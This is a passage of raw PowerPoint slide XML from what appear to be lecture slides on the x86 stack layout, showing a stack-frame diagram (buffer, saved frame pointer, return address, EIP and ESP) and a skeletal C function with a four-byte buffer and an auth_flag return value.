            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>buf2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>var1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>saved frame pointer (SFP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>return address (ret)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>*buf (function's argument)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="371" name="Shape 371"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Shape 372"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="373" name="Shape 373"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2253575" y="3963238"/>
            <a:ext cx="2238600" cy="323100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$EIP is here</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="374" name="Shape 374"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="373" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1678175" y="4124788"/>
            <a:ext cx="575400" cy="19800"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="lg" w="lg" type="none"/>
            <a:tailEnd len="lg" w="lg" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="375" name="Shape 375"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8205050" y="2513000"/>
            <a:ext cx="882900" cy="307500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ESP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="376" name="Shape 376"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="375" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7992350" y="2666750"/>
            <a:ext cx="212700" cy="39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rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>x86 Stack Details</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="382" name="Shape 382"/>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b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lets walk through how it's constructed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int function(char *buf){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  int var1 = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  char buf2[4];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  // some code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  return auth_flag;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>int main(int argc, char *argv[]){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  if(function(argv[1]) )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	  // do something</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>  ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1400"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="383" name="Shape 383"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5941969" y="1757700"/>
            <a:ext cx="2050200" cy="4770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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>------------------------------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main()'s stack frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Shape 384"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="6295550"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[high memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Shape 385"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754739" y="1571150"/>
            <a:ext cx="1448100" cy="354000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>[low memory]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
